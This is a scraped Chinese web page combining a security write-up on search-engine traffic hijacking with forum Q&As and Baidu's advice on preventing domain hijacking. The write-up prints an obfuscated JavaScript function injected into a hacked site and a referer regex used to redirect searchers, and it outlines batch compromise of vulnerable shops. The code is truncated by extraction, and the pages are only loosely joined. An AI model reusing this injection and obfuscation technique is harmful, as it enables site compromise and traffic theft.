求助,百度搜索被劫持引擎被劫持

来源:蜘蛛抓取(WebSpider) 时间:2016-02-28 11:17 标签: 搜索引擎
一次搜索引擎流量劫持事件分析
查看: 1125|
摘要: 本文接下来将分析的是一种针对搜索引擎结果的劫持行为,可见淘宝客的此类攻击手段给电商网站和普通网民都带来了极大的安全风险。场景重现:通过百度搜索引擎搜索“砭石”,在第一页可以看到如下网站的搜索结果但是点 ...
本文接下来将分析的是一种针对搜索引擎结果的劫持行为,可见淘宝客的此类攻击手段给电商和普通网民都带来了极大的安全风险。场景重现:通过百度搜索引擎搜索“砭石”,在第一页可以看到如下网站的搜索结果&但是点击这个搜索结果之后,并没有打开这个网站官网,而是跳转到淘宝的搜索页面&通过分析网络请求,发现在点击百度搜索结果之后,发起了一次可疑的访问&该URL的内容是一段恶意JS代码&至此,可以判断出该网站已经被入侵,并植入了恶意代码。恶意代码触发机制分析:通过Fiddler单步跟踪网络请求,发现这个JS文件里包含了恶意代码,触发了恶意访问请求。简单查看发现tools.js中并没有恶意URL的关键字,进一步查看发现该JS代码中被植入了一个恶意函数,函数代码如下:function CurrentXmlFrmFocus(){var arnElement=[2,9,3,8,2,8,7,5,4,3,10,5];var arsOffset=[" ",":",".","/","&","&","=","'","CRS","MOC","TPIRCS","PTTH"];var ardPopOpacity=[4,10,0,8,6,7,11,1,3,3,8,9];var strgAttribute=”";ardPopOpacity=ardPopOpacity.concat(arnElement);for(var i=0;idocument.writeln(strgAttribute);}该函数首先定义了一个关键字数组arsOffset,然后定义了两个下标数组arnElement和ardPopOpacity。接下来通过ardPopOpacity.concat(arnElement);实现对两个下标数组的合并,合并结果为:4,10,0,8,6,7,11,1,3,3,8,9,2,9,3,8,2,8,7,5,4,3,10,5。然后调用一个for循环来遍历数组下标获取对应的关键字,并对关键字进行拆分、反转、重组3个操作来还原真实的恶意代码。处理逻辑如下,当i=2时:i=2 -& ardPopOpacity[i]=10 -& arsOffset[ardPopOpacity[i]]= “TPIRCS” -& split(“”) -&T,P,I,R,C,S -& reverse() -& S,C,R,I,P,T-&join(“”) -& SCRIPT如此一来,该函数最终会拼接出一段完整的script标签:通过函数调用将此代码写入网页内容中,当网站主页被访问时触发恶意代码,发起对外请求。&恶意代码简单分析:代码首先通过一个条件判断来决定是否触发if(“undefined”==typeof(reObj))之后的处理流程跟通常的劫持流量代码类似,都是通过判断HTTP请求头中的Referer字段,如果Referer字段里包含搜索引擎的域名信息,则劫持搜索关键字重新提交到淘宝客自己的关键字接收网页,通过这个网页实现跳转到淘宝的搜索页面判断referer代码如下:var goRefers=new RegExp(“(w.baidu.c)|(image.baidu.c)|(w.google.c)|(w.soso.c)|(wenwen.soso.c)|(w.sogou.c)|(w.youdao.c)|(cn.bing.c)|(w.yahoo.c)|(so.360.c)|(w.jike.c)”,”i”);在重定向之前,该恶意代码还针对浏览器的不同,分别通过两个网站进行重定向非IE系列的浏览器通过以下地址进行跳转:/svn/branches/navigator.html?q=砭石,该页面代码如下:淘宝网特卖频道 – 每日低价商品抢购中!该页面接收一个q参数,q参数的值就是在搜索引擎里输入的查询关键字,然后将关键字组合到淘宝页面。组合后的新URL为:从而完成一次流量重定向如果是IE系列浏览器,通过以下地址进行跳转:/301.asp查看这个域名信息如下:可以看到这个人是个专门做流量劫持的淘宝客,他名下的另一个域名也是用来挂劫持搜索引擎结果的恶意代码:黑客入侵方式分析:捕获到了几起使用shopex发现流量被劫持的案例。通过结合搜索引擎技术,一旦某电商类应用的具体版本中有安全漏洞,攻击者可以通过搜索引擎搜索到所有使用该程序版本的网站,能够很方便的编写自动化攻击程序,实现对搜索引擎返回结果中所有网站的批量攻击。攻击流程为:发现漏洞-&利用搜索引擎寻找目标网站-&对搜索返回结果网站批量入侵-&批量植入恶意代码实现大规模的自动化入侵行为。如果不了解此类攻击,可以查阅2011年那次著名的LizaMoon攻击()此案例中的恶意函数通过拆分、反转、重组3步操作可以躲避针对关键字的查杀,实现高度隐蔽,并将劫持流量通过不同的重定向页面分发出去也能防止简单粗暴的封禁域名。淘宝客这次只是把流量重定向到淘宝页面,试想一下,如果黑客劫持的搜索引擎结果没有重定向到淘宝,而是一个欺诈网站呢?电商网站,安全刻不容缓!()报道
上一篇:下一篇:
Powered by Discuz! X3.2 Designed by我的搜索引擎被劫持了吗?谁懂啊!_百度知道
我的搜索引擎被劫持了吗?谁懂啊!
//d,告诉我一下吧,空格都会自动变成+号:点击回车之后搜出来的就是这是怎么回事啊所有英语句子.com/zhidao/pic/item/bd3eb1bcd8ae943f91fae0://g.baidu.jpg" esrc="http,百度搜索
自己找到原因了,是移动wifi的问题,移动真恶心死了
提问者采纳
这这这貌似是输入法的问题。。。
如果你确定这输入法只对百度有效的话、、
移动还有宽带?
连接的移动wifi啊,我说的为什么在家就没事在外就被劫持
你那个移动wifi被强制了呗,没事给你弹个广告。
除百度搜索英语空格变成+号之外,其他地方没有任何改变
提问者评价
来自团队:
其他类似问题
为您推荐:
搜索引擎的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁IE浏览器搜索引擎被劫持,是哪里的文件被篡改了?_百度知道
IE浏览器搜索引擎被劫持,是哪里的文件被篡改了?
打开ie浏览器——工具——Internet选项——Internet选项弹框切换至常规选项卡——搜索(设置)——弹框(配置相应的搜索引擎),如图:
其他类似问题
为您推荐:
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁搜狗输入法劫持IE9地址栏搜索结果的解决办法 - IE浏览器中文网站
IE浏览器中文网站
搜狗输入法劫持IE9地址栏搜索结果的解决办法
安装过IE9的用户都知道,已经将搜索栏和地址栏合并在一起了,只要你在IE9地址栏输入想要搜索的关键字,回车后就可以跳转到你设置的默认搜索引擎的结果页。但是如果你有安装并正在使用搜狗拼音输入法的话,不管你设置的默认搜索引擎是什么,它依然会跳转到搜狗引擎的页面。最让人无法接受的是,搜狗输入法居然一点提示都没有。搞不明白为什么网页的默认搜索引擎怎么由搜狗输入法去设置的?解决方法:在搜狗输入法的界面上点击最右边的“菜单”——“设置属性”——“高级”,拉至最下方,取消勾选“开启地址栏搜索”和“快速搜索”这两项。搜狗官方针对此问题也给出了回复:这个功能是地址栏搜索,当初我们做的时候,还没有IE9。所以对IE9生效也是意料之外的事情。项目组已经在修改这个问题了。新版就会让开IE自带的搜索功能。
我都卸载不用搜狗输入法了,IE也没升级,打开浏览器不是尽到我设置的主页,依然还是尽到搜狗
还没有 trackbacks如何预防域名劫持_域名被劫持怎么办_百度站长平台
域名被劫持的严重后果
域名被解析到其它地址,用户无法正常访问,网站流量受损
通过泛解析生成大量子域名,共同指向其它地址(往往是恶意垃圾网站)
域名被解析到恶意钓鱼网站,导致用户财产损失
当域名被劫持后的内容干扰搜索结果时,为保障用户的使用体验和安全,百度搜索引擎会暂时关闭对域名的收录和展示,待严格审核确认后才会再度放开
如何降低域名被劫持风险,减少损失
为域名注册商和注册用邮箱设置复杂密码,且经常更换。使用单独的DNS服务,也需要对密码进行上述设置。同时注意不要在多个重要注册地使用相同的用户名和密码。
将域名更新设置为锁定状态,不允许通过DNS服务商网站修改记录*使用此方法后,需要做域名解析都要通过服务商来完成,时效性较差
定期检查域名帐户信息、域名whois信息,每天site网站检查是否有预期外网页,或使用百度云观测进行监控——当域名被解析到恶意站点时可以第一时间收到报警(百度云观测关于域名安全的介绍)
网站运营和优化人员经常详细检查网站索引和外链信息,有异常一定要检查清楚*世界杯期间,又到了博彩利益集团疯狂窃取站点的时期
域名被劫持后该怎么做
立即修改域名服务商和邮箱密码,使用复杂度高的密码且经常更换
删除不属于你的DNS解析,恢复DNS设置
如果使用的是第三方DNS服务,应立即修改第三方DNS服务端帐户密码,锁定帐户信息,开启帐户短信邮箱类提醒
收集全部被非法添加的页面并设置404,使用百度站长平台工具提交死链
如果该服务商下域名经常出现被劫持事件,可考虑更换更安全稳定的服务商。有能力的网站可自建DNS服务,自主运维自负风险
杨明花新浪网 运营部数据经理
新浪网有专门的DNS团队,通过自己的DNS服务器为用户提供DNS解析服务,做了严格的安全防范和域名修改审计规则,因此基本没有遇到的恶意域名劫持。但对中小网站,尤其是使用了第三方DNS 服务端的站长若遇到域名劫持会面临不小的损失,期望百度能加大对劫持类站点的检测和打击力度。
蒋恩前瞻网 运营主管
前瞻网域名被盗后,马上被转移到了国外域名商,在域名基本失去所有权后,域名被加入了几十万的三级域名和端口域名做博彩页面,造成了非常严重的损失,如果不是及时联系国外域名商,锁定DNS解析和转移权限。后果不堪设想!希望百度加强打击劫持类非法博彩赌博站点,让网站运维环境更加安全。
王玄天天网 搜索引擎营销高级经理
对于电商网站来说,域名劫持产生的后果更严重:某些利益集团劫持电商网站域名后,将用户的正常访问先跳转至对应的返利网站,然后再跳转回电商网站,让用户在网购的同时不知不觉中成为了某些利益集团赚钱的工具。很高兴百度站长平台制作这个专题页面,让我们电商网站有发声的机会。

我要回帖

更多关于 搜索引擎 的文章

 

随机推荐